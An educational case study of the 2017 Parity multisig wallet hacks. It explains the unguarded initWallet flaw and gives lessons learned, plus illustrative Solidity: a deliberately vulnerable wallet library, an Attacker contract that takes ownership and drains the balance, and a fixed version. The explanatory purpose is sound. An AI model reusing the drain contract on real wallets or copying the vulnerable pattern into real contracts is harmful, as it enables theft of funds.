Parity Multisig Wallet Hack
The Story
On July 19, 2017, an attacker exploited a critical vulnerability in Parity's multi-signature wallet contract, draining approximately $30 million worth of Ether from several high-profile ICOs and projects. The affected organizations included Swarm City, Edgeless Casino, and æternity.
The vulnerability was discovered after the first attack had already occurred. The Parity team and White Hat Group quickly organized to drain the remaining vulnerable wallets before attackers could target them, saving over $150 million worth of assets.
Ironically, just months later, in November 2017, a related flaw in the updated Parity multisig library was triggered by a user who called initWallet on the shared library contract itself, became its owner, and then invoked its self-destruct function. Every wallet that delegated its logic to that library was left without code, freezing over $280 million worth of Ether and highlighting the extreme challenges of secure smart contract development.
Technical Analysis
The hack exploited a critical flaw in the Parity Multisig Wallet's initialization process. Each wallet was a thin contract that forwarded any call it did not recognise to a shared WalletLibrary contract via delegatecall, so the library's functions ran against the calling wallet's storage. The function that set the wallet's owners, initWallet, was intended to run once at deployment, but it was implemented as an ordinary public library function rather than a constructor, and nothing stopped it from being invoked again on a live wallet.
This is what the vulnerable function in WalletLibrary looked like:
// Instead of being a proper constructor function, initWallet is an ordinary
// public library function: no visibility restriction, no "already initialised"
// check, and reachable on every deployed wallet through the wallet's delegatecall fallback
function initWallet(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);  // rewrites the owner set to msg.sender plus _owners
}
The key issues were:
- initWallet() was public and not protected against being called after initialization: anyone could send it to a deployed wallet, where the fallback forwarded it to the library, and thereby rewrite the wallet's owner set to include their own address
- Once the attacker was an owner, the wallet's normal execute() function would move funds wherever they asked
The attacker's exploitation was relatively simple, two transactions per victim wallet:
- Call initWallet() on the wallet with their own address as the owner and a required-signature count of 1
- Call execute() to transfer the wallet's entire balance to their address
Lessons Learned
- Constructors should be properly declared (in current Solidity, with the constructor keyword); an initializer function that stands in for one must refuse to run a second time, which is exactly what Parity's only_uninitialized modifier fix added
- Functions that should only be called once should have safeguards to prevent multiple calls
- Access control should be rigorously enforced throughout smart contracts, including on functions reached indirectly: a delegatecall fallback exposes every public function of the target library as if it were the wallet's own
- Newly deployed code should undergo thorough security audits
- Critical functions, those that move funds or change ownership, should implement multi-layered security checks rather than trusting a single piece of mutable state such as the owner list
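The following is an added example written for this page, not Parity's code, that illustrates both the two-call attack described in the Technical Analysis section and the fix listed above. The contract names (VulnWalletLibrary, VulnWallet, Attacker, FixedWalletLibrary) are hypothetical, the daily-limit logic and the bytes _data argument of the real execute() are omitted, and the only_uninitialized guard mirrors the modifier Parity added after the incident.

```solidity
pragma solidity ^0.4.24;

// Hypothetical contracts for illustration only; not Parity's code.

// Shared logic contract. Wallets reach it with delegatecall, so every
// function here reads and writes the CALLING WALLET's storage slots.
contract VulnWalletLibrary {
    uint public m_numOwners;
    uint public m_required;
    mapping(address => bool) public isOwner;

    // Intended to run once at deployment, but it is an ordinary public
    // function with no "already initialised" guard, so anyone can re-run it
    // on a live wallet and add themselves to the owner set.
    function initWallet(address[] _owners, uint _required) public {
        m_numOwners = _owners.length;
        m_required = _required;
        for (uint i = 0; i < _owners.length; ++i) {
            isOwner[_owners[i]] = true;
        }
    }

    // The owner check itself is fine; the ownership state it trusts is what
    // the attacker has already rewritten.
    function execute(address _to, uint _value) public {
        require(isOwner[msg.sender]);
        _to.transfer(_value);
    }
}

// One instance per user; holds the Ether and forwards logic to the library.
contract VulnWallet {
    address public walletLibrary;

    constructor(address _lib, address[] _owners, uint _required) public {
        walletLibrary = _lib;
        // Initialise through delegatecall so the owner set lands in this
        // contract's storage, not the library's.
        require(walletLibrary.delegatecall(
            abi.encodeWithSignature("initWallet(address[],uint256)", _owners, _required)));
    }

    // Fallback forwards ANY unmatched call to the library, initWallet included.
    // This is the path the attacker used.
    function() public payable {
        if (msg.data.length > 0) {
            walletLibrary.delegatecall(msg.data);
        }
    }
}

// The two-call attack: re-initialise the victim wallet, then spend.
contract Attacker {
    function drain(address _wallet) public {
        address[] memory me = new address[](1);
        me[0] = address(this);
        // Step 1: the wallet's fallback delegatecalls initWallet, which marks
        // this contract as an owner with a required count of 1.
        require(_wallet.call(abi.encodeWithSignature(
            "initWallet(address[],uint256)", me, uint(1))));
        // Step 2: now an owner, execute() sends the whole balance here.
        require(_wallet.call(abi.encodeWithSignature(
            "execute(address,uint256)", address(this), _wallet.balance)));
    }

    function() public payable {}
}

// Hardened library: the guard Parity added after the incident. The first
// initialisation sets m_numOwners; every later call is rejected.
contract FixedWalletLibrary {
    uint public m_numOwners;
    uint public m_required;
    mapping(address => bool) public isOwner;

    modifier only_uninitialized { require(m_numOwners == 0); _; }

    function initWallet(address[] _owners, uint _required) public only_uninitialized {
        require(_owners.length > 0 && _required > 0 && _required <= _owners.length);
        m_numOwners = _owners.length;
        m_required = _required;
        for (uint i = 0; i < _owners.length; ++i) {
            isOwner[_owners[i]] = true;
        }
    }

    function execute(address _to, uint _value) public {
        require(isOwner[msg.sender]);
        _to.transfer(_value);
    }
}
```

Note that the guard protects each wallet's storage but not the library's own: FixedWalletLibrary is deployed with m_numOwners equal to zero, so the first caller to invoke initWallet directly on the library (not through a wallet) becomes its owner. That is what happened in November 2017, where the library additionally exposed a self-destruct that the new owner then triggered. A shared library should therefore initialise itself in its own constructor, or expose no selfdestruct path at all; the example above does the latter.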